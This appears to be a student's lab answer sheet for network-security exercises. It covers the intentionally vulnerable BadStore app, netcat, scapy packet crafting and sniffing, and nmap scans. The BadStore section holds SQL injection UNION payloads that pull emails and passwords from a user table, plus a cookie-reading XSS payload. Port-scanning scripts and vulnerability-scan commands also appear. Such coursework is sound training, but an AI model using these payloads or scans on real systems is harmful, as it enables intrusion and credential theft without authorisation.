Badstore

xx' IN (itemnum,sdesc,ldesc)
UNION SELECT email, passwd, 123, 123
FROM userdb
LIMIT 2 --


x' union select itemnum, sdesc, ldesc, price from itemdb --

x' union select count(itemnum),count(itemnum),count(itemnum),count(itemnum) from
itemdb --

<script>alert(document.cookie)</script>

Netcat


1c,5b)  #!/bin/bash
host="www.example.com" 
read -p "Enter the starting port number: " start_port
read -p "Enter the ending port number: " end_port
for (( port=start_port; port<=end_port; port++ ))
do
    echo "Scanning port $port..."
    nc -zv -w1 "$host" "$port" 2>&1
done

2c) Terminal1 - nc -vlp 1234
Terminal2 - nc localhost 1234

3b)  GET / HTTP/1.1
Host: example.com

HEAD / HTTP/1.1
Host: example.com

4b,7b,9a,11b,12b)   nc -l -p 8080 < myfile.txt
nc -l -p 8080 < image.jpg
nc -l -p 5000
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title>Nooblinux</title>
<h1>Hello from Netcat!</h1>

<img src="https://img.freepik.com/free-photo/parakeet-platycercus-barnardii-illustrated-by-elizabeth-gould_53876-65557.jpg?t=st=1743689713~exp=1743693313~hmac=4dac4220b65e8b24f283d2fea7db0d8085fb55951e7de8a541604d03988a070b&w=740">




scapy

1-	b)
from scapy.all import * 
packet=IP()/TCP() 
e_pack=Ether()/packet 
e_pack.show()


2-	b)
from scapy.all import * 
packets=sniff(count=10) 
packets.summary() 
print(packets[0].show()) 
print(packets[1].show())


3a,12a)
from scapy.all import * 

result,unanswered=traceroute(["www.example.com","www.google.com"],maxttl=20) 

result.show()


4a,11a)
import scapy.all as scapy
request = scapy.ARP()
request.pdst = "192.168.1.1/28"
broadcast = scapy.Ether()
broadcast.dst = "ff:ff:ff:ff:ff:ff"
request_broadcast = broadcast / request
clients = scapy.srp(request_broadcast, timeout=2)[0]
for element in clients:
    print(element[1].psrc + " - " + element[1].hwsrc)


7-  a)
from scapy.all import * 
packet=IP(dst="8.8.8.8")/ICMP() 
send(packet)

8- a) 
from scapy.all import *
target = "www.example.com"
for port in range(20, 25):
    packet = IP(dst=target) / TCP(dport=port, flags="S")
    response = sr1(packet, timeout=1, verbose=0)
    if response:
        print("Port", port, "is open")


10- a)
from scapy.all import *
def callback(packet):
    if packet.haslayer(ICMP):
        print("ICMP Packet Detected")
        packet.show()

sniff(filter="icmp", prn=callback, count=10)


zenmap

3c) nmap -sn <target>
nmap <target>


4c,9b)  nmap 192.168.64.1-10
nmap 192.168.64.1/24

5c,10b)  nmap <ip_addr>
nmap -sV <target>

6b)  nmap -O <target>
nmap -A <target>

8b)  nmap --script vuln <target>
(save a file document and then see in file explorer
